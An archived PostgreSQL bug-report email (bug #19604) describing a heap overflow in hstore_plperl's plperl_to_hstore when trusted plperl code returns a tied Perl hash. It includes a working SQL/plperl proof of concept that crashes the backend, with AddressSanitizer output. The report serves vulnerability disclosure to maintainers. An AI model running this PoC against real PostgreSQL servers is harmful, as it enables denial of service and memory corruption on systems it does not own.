Received: from malur.postgresql.org ([217.196.149.56]) by arkaria.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wqrel-0000Yf-1U for pgsql-bugs@arkaria.postgresql.org; Mon, 03 Aug 2026 12:20:35 +0000 Received: from localhost ([127.0.0.1] helo=malur.postgresql.org) by malur.postgresql.org with esmtp (Exim 4.96) (envelope-from ) id 1wqrEz-005zJ5-2Z for pgsql-bugs@arkaria.postgresql.org; Mon, 03 Aug 2026 11:53:57 +0000 Received: from makus.postgresql.org ([2001:4800:3e1:1::229]) by malur.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wqnx0-004h7K-0x for pgsql-bugs@lists.postgresql.org; Mon, 03 Aug 2026 08:23:10 +0000 Received: from mahout.postgresql.org ([2001:4800:3e1:1::227]) by makus.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.98.2) (envelope-from ) id 1wqnwy-00000001fbT-1oIa for pgsql-bugs@lists.postgresql.org; Mon, 03 Aug 2026 08:23:09 +0000 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=postgresql.org; s=20171124; h=Message-ID:Date:Reply-To:Cc:From:To:Subject: Content-Transfer-Encoding:MIME-Version:Content-Type:Sender:Content-ID: Content-Description:In-Reply-To:References; bh=/HD2DzJzHNbaVEab2cBhmEfJM35lBB76UnCID/f4Tzo=; b=rP7QaPGPe8ANLI2uon1JO2Bby9 GXonGVSNylKx1mmxyJlCsQtVFFhHm18N+aX/N2woHN3rDc3LqLIRqxI59QHTtHnlMF4bCZ/po9KY7 zse1vFqRcc9Up/xjk8jvnnDpioOlv4i/y6xHlC8r5/N5vAa3d7SQLsnSuT5Y/RoO3CV5pK3oEAWjX WkN1kKkF3AGl035gtMQ29Bs3PRjGnEyQOqXjfa6pLnEYAobcwghJRjqouWsPYvzT8FAm4jJxKP6Ul 47GDyvoCwcjBOXkOFy/wGcfZu71zhrTpdvtRptJ9ft32+ZHeFUz3o/MJspwxyp+qOii/5hIWeL1N+ U97SNLrw==; Received: from wrigleys.postgresql.org ([2a02:16a8:dc51::60]) by mahout.postgresql.org with esmtps (TLS1.3) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.96) (envelope-from ) id 1wqnwu-000tW1-2p for pgsql-bugs@lists.postgresql.org; Mon, 03 Aug 2026 08:23:07 +0000 Received: from localhost ([127.0.0.1] helo=wrigleys.postgresql.org) by wrigleys.postgresql.org with esmtp (Exim 4.98.2) (envelope-from ) id 1wqnwt-0000000CGLB-36df for pgsql-bugs@lists.postgresql.org; Mon, 03 Aug 2026 08:23:03 +0000 Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Subject: BUG #19604: Bug 9: `plperl_to_hstore` heap overflow with a tied Perl hash To: pgsql-bugs@lists.postgresql.org From: PG Bug reporting form Cc: 1217816127@qq.com Reply-To: 1217816127@qq.com, pgsql-bugs@lists.postgresql.org Date: Mon, 03 Aug 2026 08:22:20 +0000 Message-ID: <19604-2471ca9f781fa9e0@postgresql.org> X-Auto-Response-Suppress: All Auto-Submitted: auto-generated List-Id: List-Help: List-Subscribe: List-Post: List-Owner: List-Archive: Archived-At: Precedence: bulk The following bug has been logged on the website: Bug reference: 19604 Logged by: Yuelin Wang Email address: 1217816127@qq.com PostgreSQL version: 19beta2 Operating system: Linux (Ubuntu 24.04, x86_64) Description: =20 ### Summary In `contrib/hstore_plperl/hstore_plperl.c`, `plperl_to_hstore()` sizes its `Pairs` array from `hv_iterinit()`. For tied Perl hashes, that count can be small while `hv_iternext()` yields many keys. Trusted `plperl` code can return such a hash and write far past the allocated array during hstore conversion. ### PoC SQL script: ```sql CREATE EXTENSION IF NOT EXISTS hstore; CREATE EXTENSION IF NOT EXISTS plperl; CREATE EXTENSION IF NOT EXISTS hstore_plperl; CREATE OR REPLACE FUNCTION vuln_hstore_boom() RETURNS hstore LANGUAGE plperl TRANSFORM FOR TYPE hstore AS $$ package VulnEvil; sub TIEHASH { bless { n=3D>0, max=3D>100000 }, shift } sub FIRSTKEY { $_[0]{n}=3D0; "k0" } sub NEXTKEY { my $s=3Dshift; $s->{n}++; $s->{n}>=3D$s->{max} ? undef : "k".$s->{n} } sub FETCH { "v" } sub EXISTS { 1 } package main; tie my %h, 'VulnEvil'; return \%h; $$; SELECT vuln_hstore_boom(); ``` ### Result The backend crashes during hstore conversion: ```text AddressSanitizer: SEGV plperl_to_hstore plperl_sv_to_datum plperl_func_handler server closed the connection unexpectedly ```